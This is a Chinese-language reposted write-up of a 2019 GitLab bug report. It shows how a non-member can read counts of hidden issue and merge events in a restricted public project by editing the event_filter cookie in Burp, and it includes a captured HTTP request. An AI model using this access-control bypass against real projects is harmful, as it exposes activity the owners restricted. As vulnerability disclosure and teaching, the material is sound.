-
背景
-
复现步骤
gitlab漏洞系列-越权获取合并事件的个数
声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。
背景
ashish_r_padelkar于2019年提交了这个漏洞: 如果一个项目进行了如下的设置,任何项目的非成员都可以获取合并事件/issue的活动次数
非成员用户看到以下选项:
按道理来说,他们不能看到活动事件,如问题/合并事件等。然而,对他们来说,获得此类事件的计数是可能的!
复现步骤
-
作为公共项目的所有者,将问题和存储库设置为Only project Members
2.以任何用户的身份登录并访问这个公共项目。你只会看到2个选项,all和team。
3.点击它们中的任何一个,然后在burp中查看请求。
GET /gitlabadminrsspl1111/thisispublicproject/activity?limit=20&offset=0 HTTP/1.1
Host: gitlab.com
Connection: close
Accept: application/json, text/plain, */*
X-CSRF-Token: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36
Referer: https://gitlab.com/gitlabadminrsspl1111/thisispublicproject
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: issue_board_welcome_hidden=true; promote_burndown_charts_dismissed=true; cycle_analytics_help_dismissed=1; _ga=GA1.2.922314095.1537686075; _mkto_trk=id:194-VVC-221&token:_mch-gitlab.com-1537686075533-44677; pipeline_schedules_callout_dismissed=true; _biz_uid=18351712817945caaf2f1d99e4ae1589; auto_devops_settings_dismissed=true; _biz_flagsA=%7B%22Version%22%3A1%2C%22XDomain%22%3A%221%22%2C%22Mkto%22%3A%221%22%2C%22Frm%22%3A%221%22%7D; _fbp=fb.1.1549094360636.1901280804; sidebar_collapsed=false; frequently_used_emojis=thumbsup%2Cart%2Cbasketball%2Cthumbsdown%2Cbicyclist_tone3%2Cbaseball; _sp_id.6b85=1-c31c-4026-821a-1-06a8-492f-b0f0-9929021a8ee4; _gid=GA1.2.973204736.1557559750; _gitlab_session=1; _biz_sid=10f6f3; _biz_nA=1113; _biz_pendingA=%5B%5D; event_filter=team
If-None-Match: W/"1"
4.如果你在上面的请求中看到Cookie头,有一个名为event_filter的参数。它负责获取这些事件。
5.现在,要获得问题或合并事件,只需将此发送到burp repeater,并将event_filter的值更改为issue或merged。
6.响应中,你会看到{"html":"n","count":3}
,这表示合并。这意味着有3个合并事件发生在这个项目之中;
原文始发于微信公众号(迪哥讲事):gitlab漏洞系列-越权获取合并事件的个数
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论